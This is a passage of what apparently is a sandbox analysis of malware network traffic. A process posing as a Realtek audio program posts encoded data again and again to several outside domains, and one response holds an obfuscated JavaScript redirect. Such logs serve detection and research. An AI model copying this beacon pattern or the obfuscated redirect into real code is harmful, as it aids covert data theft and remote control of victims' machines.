                                                                                Data Raw: 32 57 4c 63 48 3d 59 4b 54 36 6f 2b 6f 6c 59 66 46 77 54 4d 6d 71 4e 5a 62 75 73 51 78 38 5a 61 41 54 6e 6b 4f 69 4d 7a 34 2f 51 77 32 31 6e 39 70 61 34 46 6b 70 53 68 32 4f 41 47 34 32 75 4c 37 2b 59 76 63 33 43 78 6b 2f 36 7a 2f 6b 2b 51 78 54 6e 2f 4e 71 55 7a 38 34 73 41 69 51 4a 66 6d 42 66 78 76 4e 57 35 43 6d 62 74 6a 52 38 54 75 46 72 51 36 63 6b 42 64 74 51 64 31 4c 68 72 54 61 37 48 76 65 39 57 30 33 6b 6e 47 53 74 56 65 31 4b 73 41 2b 45 47 6b 55 74 4b 56 6b 38 79 44 57 59 46 4d 50 69 6c 2f 65 6f 75 35 6a 36 49 6a 45 43 6e 42 35 6a 73 69 59 68 4a 70 45 53 36 73 69 6b 6b 32 46 42 77 3d 3d
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwTMmqNZbusQx8ZaATnkOiMz4/Qw21n9pa4FkpSh2OAG42uL7+Yvc3Cxk/6z/k+QxTn/NqUz84sAiQJfmBfxvNW5CmbtjR8TuFrQ6ckBdtQd1LhrTa7Hve9W03knGStVe1KsA+EGkUtKVk8yDWYFMPil/eou5j6IjECnB5jsiYhJpES6sikk2FBw==
                                                                                Nov 25, 2024 11:58:47.583050966 CET | 503 | IN | HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:47 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 11:58:47.583059072 CET  5  IN
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                19  192.168.11.20  49760  8.210.46.21  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:58:50.133686066 CET  744  OUT  POST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=YKT6o+olYfFwVtWqCYbu8Ax7caATpEOmMz0/Qyb4nPda4k0pTg2ODG42mr77H/cgCxZC6x7k+QlTn+9qUi87tQiOB/mPChvNW5CmbrP78SGFqhqclkpqTd1EirTa/HvS9W0FkmqstXW1Kps+FXkTmKVukSCFfGdGl3zwpphv7Y35KRMj+eW8ia12WKVKmm3ecymUjdxduczzA/QaGSPPYpk=
                                                                                Nov 25, 2024 11:58:50.451659918 CET  503  IN  HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:50 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 11:58:50.451673985 CET  5  IN
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                20  192.168.11.20  49761  8.210.46.21  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:58:52.975769043 CET  2578  OUT  POST /r45a/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Origin: http://www.prhmcjdz.tokyo
                                                                                Referer: http://www.prhmcjdz.tokyo/r45a/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:52.975841045 CET  5315  OUT
                                                                                Data Ascii: z26KlzMpKTkxlUMLR7pQMIot8voycEOV+RvdeeSWM6hg3qzlA42PuM+1SkfqYHRyV4oPLU6+r9DDw6crPJ996Ty83zVR9fC2/Cr/AVYgfkQlj2lYbOLxpcEJuENejVu5bITV/2VakiBxdDjZmY3J5WbdCB5Ul19qSRIKtUPv+R6Jwi6D5sAgqDRytx1TkONTjyS9iek0mtVKpJZwykETnSV3xu5YkFH1s+7Yo/JzztX7nV/txl0
                                                                                Nov 25, 2024 11:58:53.292707920 CET  503  IN  HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:53 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                Access-Control-Allow-Origin: http://www.prhmcjdz.tokyo
                                                                                Access-Control-Allow-Credentials: true
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}
                                                                                Nov 25, 2024 11:58:53.292756081 CET  5  IN
                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                21  192.168.11.20  49762  8.210.46.21  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:58:55.801866055 CET  456  OUT  GET /r45a/?2WLcH=VI7arJMCR+F5a8GIF7LvlydvT54UqGGGJzEBbUfyg8Id9FJQQiiIP0Zhv5D8EvYCLyQ71yr7yDtQnd5dLG0ZmCq3JeeWBBH/ELG6XL/ZgjHL6FvdoncqEJc=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.prhmcjdz.tokyo
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:58:56.102536917 CET  427  IN  HTTP/1.1 200
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:58:55 GMT
                                                                                Content-Type: application/json;charset=utf-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Origin
                                                                                Vary: Access-Control-Request-Method
                                                                                Vary: Access-Control-Request-Headers
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-Cache: MISS
                                                                                Data Raw: 35 34 0d 0a 7b 22 6d 73 67 22 3a 22 e8 af b7 e6 b1 82 e8 ae bf e9 97 ae ef bc 9a 2f 72 34 35 61 2f ef bc 8c e8 ae a4 e8 af 81 e5 a4 b1 e8 b4 a5 ef bc 8c e6 97 a0 e6 b3 95 e8 ae bf e9 97 ae e7 b3 bb e7 bb 9f e8 b5 84 e6 ba 90 22 2c 22 63 6f 64 65 22 3a 34 30 31 7d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 54{"msg":"/r45a/","code":401}0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                22  192.168.11.20  49763  154.88.22.105  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:59:01.584850073 CET  712  OUT  POST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPwISfMxIiNROmZ449UJ+8OCxYNW/h9vkJZZ6rnnzIBC7iM7A/mYHOu5WFcAPhDAyq9Do+OeGZoz7sJtNuy0O7e4zRz3VykPBnkaZ4AJJAz/Ct2ov3DPvf7WHkyNNFeMXNcipbWGV/JVMLPGp2HcPtfBmMsucipkZuUusi7tiMxiVuRrG6Wa4Ylg==
                                                                                Nov 25, 2024 11:59:01.910096884 CET  364  IN  HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 19 7e 21 5e 19 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 2b 3f d7 f6 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~!^>~y!UIf~Y&6P+?Z0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                23  192.168.11.20  49764  154.88.22.105  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:59:04.411242962 CET  732  OUT  POST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=ywwe4ThpJYpPyrafA3AiLxOlc449ep/UOCNYNUTL99AJZ5KrmmzIIS7iHbA6iYHVu5SrcEHhDEaq9Hk+OvGaqj7ucdNs20O7e4zRz3RUkPZnkqJ4AoJH7fCq/Iv3HPvb7WHjyMQNeOvNcjZbWSBwAVNhSWoaUNm3XwKjgsIHo0V1R4h4mfWoyxJcVb/SUY5D4pct2zq+0S4iqwYz6rTTQVE=
                                                                                Nov 25, 2024 11:59:04.730123043 CET  364  IN  HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 19 7e 21 5e 19 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 2b 3f d7 f6 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~!^>~y!UIf~Y&6P+?Z0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                24  192.168.11.20  49765  154.88.22.105  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:59:07.240382910 CET  2578  OUT  POST /sp9i/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Origin: http://www.cg19g5.pro
                                                                                Referer: http://www.cg19g5.pro/sp9i/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:07.240436077 CET  5303  OUT
                                                                                Data Ascii: NZY9vs+CJ22P83cHWHPwszuJ/DVyjCU0np7sZqf5lZMQsfqQ4kKQHP5AWXJT22+AsQtu+BNO6b0QOkz7QFJkAVwFoW6Z7JPKWqZHCBSIYa3tLS4G62UfxpMo2xGAhDbnpcNsHsE+TNd9ZYtwz4ga1O9x5qR6kyfRThwG81InTM4Vxnz67R41eiYZS1hSL6E/QrgoUdK5IevL/z07U1gEA22uhc7tlMIzacm/NR3y3gccmazTD1G
                                                                                Nov 25, 2024 11:59:07.558897018 CET  364  IN  HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Content-Encoding: gzip
                                                                                Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 19 7e 21 5e 19 3e b9 7e 79 be 21 81 55 49 99 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 2b 3f d7 f6 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~!^>~y!UIf~Y&6P+?Z0


                                                                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                25  192.168.11.20  49766  154.88.22.105  80  7484  C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                Timestamp  Bytes transferred  Direction  Data
                                                                                Nov 25, 2024 11:59:10.061517954 CET  452  OUT  GET /sp9i/?2WLcH=/yY+7m1AZbgb0K2/LwtBLxCjXaU0b9j5Pi53FyGdgcs4UrSukFrrBxiVM6k9vqLarsWUeALRJhCd8Ws3EraXiGfQePxT8U++C5GowWJeifl9yaVeP5ongLY=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.cg19g5.pro
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Nov 25, 2024 11:59:10.374891996 CET  332  IN  HTTP/1.1 200 OK
                                                                                Server: nginx
                                                                                Date: Mon, 25 Nov 2024 10:59:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                Data Ascii: 57<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly9hNTJhLmNnMTQzbi5wcm86NjY4OQ==')</scri3pt>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.11.20 | 49767 | 43.155.76.124 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:16.144438982 CET | 718 | OUT | POST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNT7W+3f4+xAaXLbMeUuTgWCmVa6ZBAFLqI8ySZ35JTjURYQG4o3V1GoPOgzXaISIwO3Ac9Sqd66bWGQCC063f/vo23AO0EfJvvDhtyOmbDZ7dzpuYp+ENxFA+FEo/wwJ2Pk1V7St54r/3jG5DIHtAkt2Lif83+CM6rNpZfOzt+fPYFjGr0baNzA==
Nov 25, 2024 11:59:16.465785027 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:16 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.11.20 | 49768 | 43.155.76.124 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:18.981373072 CET | 738 | OUT | POST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=+YME3s+bZICNVoe+7e4+2gaUH7MedOSpWC6Va40KA2vqJeaSY25JQjURAAG5mXVEGpzGgzbaIWowOy8c9hyegKbUNwCApK3f/vo23AaeEfBvuzRtg7ScJ57e5JuY+uERxFAcFGRQw052PkFV7Dt6zr/xum4OHHBKkv6vr9478hMbj7kDC8HJ9MTqBT/D2ZbWuHUA9eg2vk3NJ4XdJXQZ2eU=
Nov 25, 2024 11:59:19.295945883 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:19 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.11.20 | 49769 | 43.155.76.124 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:21.829489946 CET | 2578 | OUT | POST /gzx8/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Origin: http://www.nuy25c9t.sbs
                                                                                Referer: http://www.nuy25c9t.sbs/gzx8/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 7370
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Data Ascii: 2WLcH= [TRUNCATED]
Nov 25, 2024 11:59:21.829579115 CET | 5156 | OUT |
                                                                                Data Ascii: CGl9vTdoGyfpwBEN/YruiTVpfU0hA7hVtY1BnvDPpzOmNvXzMQgp/kHpFLRPU5UWBZhyUxzvN0CNN65ktv1RZGZkNErCF94GfrCuZaUZ7DEhCEg88f5EdTaosHYXIDi9mBTDhu/s0F9W8c+RZjFnjAPKcuJ+gW2uaqMAC9DFN0xg9OolhBZB33fdTv7j8gL7ax6hGE0cIS3FL1j/2yMugQL8Xvxl3xZQBD1d94l2qOXiHSnxPRt
Nov 25, 2024 11:59:21.829592943 CET | 153 | OUT |
                                                                                Data Ascii: z3UigK8VwAJBR6f7LsDJ1uhd/+/MsGjn307bRUtw+dMqB1xSTO3V9f+RTVUue6zsj63m/dHUGtpunQ/hAM3VCOg56dn9uVbw4UVZKIXqLkSec8Us9jrYfa3QbVbDZLtnbzRu5q+YN2cNee1AyYpNNLA==
Nov 25, 2024 11:59:22.149450064 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:21 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.11.20 | 49770 | 43.155.76.124 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:24.667762995 CET | 454 | OUT | GET /gzx8/?2WLcH=zakk0Z6QX+PeMKuO9doP3TuSH4tsROWjUg+AcMIBC3jNAdeJcFpvchgVbxSCnVd2G7blpBbqDXciYyMV8Uav3uCQEiSaobLJsegQ2xqoFvZbzlxviNb8bJg=&ZQ=9w6eOuayM HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.nuy25c9t.sbs
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
Nov 25, 2024 11:59:24.984286070 CET | 306 | IN | HTTP/1.1 404 Not Found
                                                                                Server: Tengine
                                                                                Date: Mon, 25 Nov 2024 10:59:24 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Content-Length: 146
                                                                                Connection: close
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.11.20 | 49771 | 66.29.149.46 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:30.267843008 CET | 724 | OUT | POST /rb2m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Origin: http://www.golivenow.live
                                                                                Referer: http://www.golivenow.live/rb2m/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 202
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                                Data Ascii: 2WLcH=OubFpWeL9aee1IMCQRYFfN649LIo/i/gkfXcmCNMDK63A0O/lago5k2W33SabWx10M/wxLe3ORINlmwGiYemL9821E7T29NQRNSitXh+iDLB5jgm17X+73rsfGNEYBzvFGVHHe5tV1PmLRL42daUQvIp56X50QQYGkuQ49cxpGsFVAQ2nDvyWt5znMEC9yr/Ag==
Nov 25, 2024 11:59:30.448292017 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Mon, 25 Nov 2024 10:59:30 GMT
                                                                                Server: Apache
                                                                                Content-Length: 493
                                                                                Connection: close
                                                                                Content-Type: text/html
                                                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.11.20 | 49772 | 66.29.149.46 | 80 | 7484 | C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 11:59:32.952253103 CET | 744 | OUT | POST /rb2m/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Encoding: gzip, deflate
                                                                                Accept-Language: en-us
                                                                                Host: www.golivenow.live
                                                                                Origin: http://www.golivenow.live
                                                                                Referer: http://www.golivenow.live/rb2m/
                                                                                Cache-Control: max-age=0
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Content-Length: 222
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
